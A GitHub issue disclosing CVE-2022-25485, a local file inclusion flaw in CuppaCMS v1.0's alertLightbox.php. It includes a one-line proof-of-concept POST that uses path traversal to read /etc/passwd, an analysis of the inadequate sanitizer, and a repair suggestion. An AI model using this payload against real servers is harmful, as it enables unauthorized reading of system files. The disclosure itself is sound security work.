Headline
CVE-2022-25485: Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php · Issue #24 · CuppaCMS/CuppaCMS
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip
poc
POST /alerts/alertLightbox.php
url=../../../../../../../../../../../etc/passwd
analysis
location:alerts/alertLightbox.php line 113
<?php include $cuppa->getDocumentPath().@$cuppa->POST("url");
and $cuppa->POST
// post
public function POST($string){
return $this->sanitizeString(@$_POST[$string]);
}
go on
public function sanitizeString($string){
return htmlspecialchars(trim(@$string));
}
so the post url without any lfi protected filter
Repair suggestions
you can check url ,for example check if it has … then refuse this request